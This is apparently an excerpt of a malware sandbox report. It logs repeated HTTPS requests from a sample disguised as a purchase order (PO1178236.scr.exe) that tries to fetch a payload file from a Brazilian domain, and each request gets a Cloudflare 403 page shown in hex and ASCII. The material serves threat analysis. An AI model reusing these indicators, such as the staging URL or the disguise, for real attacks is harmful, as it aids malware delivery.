        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:37:32 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jQi7EFgrF291LmGg45iqMi2ScsgQVqLacNdihGvi5fUeL8YSPdiOcIU7DXdSAX%2BeT229FzALOpBXbX%2Bh24DmKXYVgE%2FffD2GxM%2B6mkShKinamM5psd59mfRleEhonkU3VCQL44LmA%2BZKissZ"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c2df499b8c6c-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1992&min_rtt=1991&rtt_var=749&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1457813&cwnd=168&unsent_bytes=0&cid=75fa9eb6dc9f2386&ts=149&x=0"
        2025-01-09 07:37:18 UTC360INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:37:18 UTC1369INData Raw: 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d
        Data Ascii: udflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=
        2025-01-09 07:37:18 UTC1369INData Raw: 6f 6e 20 63 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 63
        Data Ascii: on cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.c
        2025-01-09 07:37:18 UTC1369INData Raw: 78 74 2d 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 32 64 66 34 39 39 62 38 63 36 63 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64
        Data Ascii: xt-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c2df499b8c6c</strong></span> <span class="cf-footer-separator sm:hidd
        2025-01-09 07:37:18 UTC1002INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 32 64 66 34 39 39 62 38 63 36 63 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 49 7a 4e 79 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76
        Data Ascii: window._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c2df499b8c6c',t:'MTczNjQwODIzNy4wMDAwMDA='};v
        2025-01-09 07:37:18 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        133192.168.2.949842188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:37:18 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:37:18 UTC1007INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:37:18 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:37:33 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DluGHgQQ0cpVVikz33QUQvxQXE6m6OKNYdm9EbMOUWiQm%2FtuBAc5sjRdPdyKiZFHI8sspddrHoV4q%2FCdYJwDq55NmfQtwHPRZKb7OdaJrXgx44%2F53Gh0juHmMocxs1uL%2FUzyzGWtdEscvtmY"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c2e30afb43a0-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1582&min_rtt=1575&rtt_var=606&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1782661&cwnd=219&unsent_bytes=0&cid=02188a39a65eb947&ts=151&x=0"
        2025-01-09 07:37:18 UTC362INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:37:18 UTC1369INData Raw: 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65
        Data Ascii: flare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=de
        2025-01-09 07:37:18 UTC1369INData Raw: 20 63 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 63 61 70
        Data Ascii: cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.cap
        2025-01-09 07:37:18 UTC1369INData Raw: 2d 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 32 65 33 30 61 66 62 34 33 61 30 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e
        Data Ascii: -left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c2e30afb43a0</strong></span> <span class="cf-footer-separator sm:hidden
        2025-01-09 07:37:18 UTC1000INData Raw: 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 32 65 33 30 61 66 62 34 33 61 30 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 49 7a 4f 43 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76 61 72
        Data Ascii: ndow._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c2e30afb43a0',t:'MTczNjQwODIzOC4wMDAwMDA='};var
        2025-01-09 07:37:18 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        134192.168.2.949843188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:37:19 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:37:19 UTC1015INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:37:19 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:37:34 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VWvXPRUiMaJSlXauqEr7naVz%2FkdMKyeuiUZTfyI0OCE3vBuL%2FK4Y%2B7XQ5%2BHeQmhf6TfZH4g3e%2BGzPiUYjAh50NFqf17tQhY1b0Jp8Xlo%2Fr%2B2amQyPQPZLMS0UlVNvS6lL0CdSb1YmWF2zdH%2B"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c2e83d350c9c-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1502&min_rtt=1498&rtt_var=570&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1907250&cwnd=241&unsent_bytes=0&cid=aba3629948b415dd&ts=154&x=0"
        2025-01-09 07:37:19 UTC354INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:37:19 UTC1369INData Raw: 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22
        Data Ascii: | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="
        2025-01-09 07:37:19 UTC1369INData Raw: 2d 73 65 63 74 69 6f 6e 20 63 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21
        Data Ascii: -section cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div><!
        2025-01-09 07:37:19 UTC1369INData Raw: 20 73 6d 3a 74 65 78 74 2d 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 32 65 38 33 64 33 35 30 63 39 63 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73
        Data Ascii: sm:text-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c2e83d350c9c</strong></span> <span class="cf-footer-separator s
        2025-01-09 07:37:19 UTC1008INData Raw: 70 74 3e 0a 20 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 32 65 38 33 64 33 35 30 63 39 63 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 49 7a 4f 53 34 77 4d 44 41 77 4d 44
        Data Ascii: pt> window._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c2e83d350c9c',t:'MTczNjQwODIzOS4wMDAwMD
        2025-01-09 07:37:19 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        135192.168.2.949844188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:37:19 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:37:20 UTC1005INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:37:20 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:37:35 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SG7aXG6x5JnKBFRIKKpmHH5D%2B4ALJn5yz7I3TAjR3j%2Fg3uHWpyYd06vyQqVL93zfgmlfctvhndksjTT2108NXJUQF3vhS27LAr%2BPq0enBmv2eciT9ddSQiPO4vLsSQQRkFr1wggwHTd34Vtv"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c2ec1921428f-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1950&min_rtt=1922&rtt_var=740&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1519250&cwnd=100&unsent_bytes=0&cid=a4852dec57675f58&ts=149&x=0"
        2025-01-09 07:37:20 UTC364INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
